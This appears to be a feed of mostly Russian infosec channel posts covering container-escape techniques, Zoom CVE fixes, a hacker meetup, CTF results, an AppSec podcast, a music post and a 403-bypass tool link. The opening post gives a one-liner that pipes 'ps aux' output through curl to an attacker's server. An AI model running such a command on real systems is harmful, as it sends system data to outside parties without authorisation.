Blind RCE method:
ps aux|curl http://<your-server> -d @-

Нашел очень достойную подборку разных техник побега из контейнера с примерами и описанием, среди которых:
- CVE (уязвимости container runtime и linux kernel)
- Exposed Docker Socket
- Excessive Capabilities
- Host Networking Driver
- Sensitive Mounts

Это актуально и для Kubernetes. Для пентестеров будет полезно знать, как можно нарушить изоляцию контейнеров, а для security team, что надо харденить.

Zoom fixed two post-auth RCE (CVE-2021-34416, CVE-2021-34414) and remote system crash (CVE-2021-34415) in Zoom on-premise Meeting Connector found by our researchers Nikita Abramov and Egor Dimitrenko.

Advisory: https://explore.zoom.us/en/trust/security/security-bulletin/

11 декабря 2021 года в 18:00 будет очередной meetup r0crewKZ в Алматы! Будет бесплатное пиво (в разумных количествах) и доклады!

Темы докладов:

1. Мошенничество OLX: Итоги расследования (morty)

2. Attacking Software Developers. Часть 1 (thatskriptkid)

3. Почему вы этого не делаете? (novitoll)

4. Attacking Software Developers. Часть 2 (thatskriptkid)

5. Эксплоитить Линукс ядро стало сложнее, но нас не остановить (novitoll)

6. Бофаем винду сокетами (undefi)

Место: Lenore Pub, проспект Абая, 124, https://go.2gis.com/jozza

Мы победили в третий раз подряд на The Standoff 365!

#standoff #infosec #phdays #ctf #codeby #nitroteam

@nitroteamchannel

Новый курс от Offensive Security для SOC инженеров 🔥🔥🔥

https://www.offensive-security.com/soc200-osda/

Appsec следующий шаг для редтимера?

#podcast

С пылу, с жару, спешу порадовать вас новым записанным подкастом!

В этот раз я поговорил с Денисом Рыбиным (Head of AppSec - бывшего Mail.ru, нынешнего бизнес юнита Mail.ru в VK) о том, кто такие AppSec специалисты, чем они отличаются от пентестров, чем отличается их скиллсет и траектория обучения, а также обо всем, что окружает их в работе!

Мне кажется наш подкаст становится с каждым разом все лучше и лучше, надеюсь вы это тоже оцените.

Все вопросы можете оставлять в чате, Я и Денис сможем на них поотвечать.

Егор Богомолов и Денис Рыбин — Взгляд на работу AppSec специалиста изнутри (https://podcast.ru/1589311841)

Kavinsky reboot! 👾
https://www.youtube.com/watch?v=N5u6YYqWgEo

Anna Fruit ❤️

Geek woman's crowded workday schedule:
1. 13:00 waking up with neighbor's drilling works
2. recording drilling works
3. shower
4. recording eggs frizzle
5. 14:00 breakfast
6. glitching noises
7. knoсking things with a Japanese stick
8. 19:00 lunch
9. making love with one shots
10. having sex with gears
11. 0:00 going out for a walk
12. standing in the dark copse beyond the shed with a branch
13. recording knocking the fence
14. recording a huge dumptruck
15. 3:00 dinner
16. red hot night with Ableton Live
17. 6:00 to sleep, perchance to dream

https://soundcloud.com/annafruit

4-ZERO-3

Tool to bypass 403/401. This script contain all the possible techniques to do the same.

https://github.com/Dheerajmadhukar/4-ZERO-3

#forbidden #bypass #bugbounty